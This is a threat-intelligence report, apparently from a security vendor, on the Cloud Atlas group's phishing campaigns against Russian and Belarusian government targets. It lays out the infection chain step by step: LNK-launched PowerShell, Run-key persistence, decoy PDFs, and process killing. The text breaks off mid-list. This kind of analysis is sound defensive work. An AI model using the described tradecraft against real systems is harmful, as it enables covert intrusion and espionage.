Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload

Cloud Atlas attacks the public sector and diplomatic structures of Russia and Belarus, using ReverseSocks, SSH, and Tor for persistence in infected systems and its new tool, PowerCloud.

In 2025, we observed pervasive SSH tunnel activity, which has remained active into 2026, affecting many government organizations and commercial companies in Russia and Belarus. Behind some of this activity is Cloud Atlas, a group we have known since 2014 . During our investigation, we identified new tools used by this group, as well as indicators of compromise. The group is back to sending out archives containing malicious shortcuts that launch PowerShell scripts.

This technique is employed in addition to the previously described use of malicious documents, which exploit an old vulnerability in the Microsoft Office Equation Editor process ( CVE-2018-0802 ) to download and execute malicious code. We have observed the use of third-party public utilities (Tor/SSH/RevSocks) to gain a foothold in infected systems and create additional backup control channels. Technical details Initial infection As for the primary compromise, Cloud Atlas remains consistent in using phishing. In the observed campaigns, the attackers emailed a ZIP archive containing an LNK file as an attachment.

Malware execution flow Attackers use LNK shortcuts to covertly execute PowerShell scripts hosted on external resources. The command line of the shortcut: Example of the PowerShell script downloaded and executed by the shortcut: Example of the PowerShell script downloaded by the shortcut Actions performed by the downloaded PowerShell: Step Action Description 1 Drops “$temp\fixed. ps1” Pre-staging: places the main payload locally in advance to ensure an execution capability independent of subsequent network connectivity or C2 availability.

2 Creates “Run” registry key “YandexBrowser_setup” for “$temp\fixed. ps1” startup Early persistence: guarantees execution upon the next logon or reboot. If the script is interrupted during later stages, the payload will still activate automatically. 3 Downloads and drops “$temp\rar. zip” Extracts “*. pdf” from the downloaded “$temp\rar. zip” Payload delivery: retrieves the decoy archive from the remote server to prepare user-facing content for the distraction phase. 4 Extracts “*. pdf” from the downloaded “$temp\rar.

zip” Decoy preparation: unpacks the legitimate-looking document so it can be executed silently without requiring user interaction. 6 Opens extracted decoy document “*. pdf” with user’s default software User distraction: opens a convincing document to maintain user engagement and creates a legitimate workflow appearance to buy additional 30–120 seconds for background operations. 6 Executes “taskkill. exe /F /Im winrar. exe” Process concealment: terminates the archive extractor to prevent the user from seeing the archive contents or noticing unexpected file extraction activity.

7 Searches and deletes “rar. zip”, “*. pdf. zip” and “*. pdf.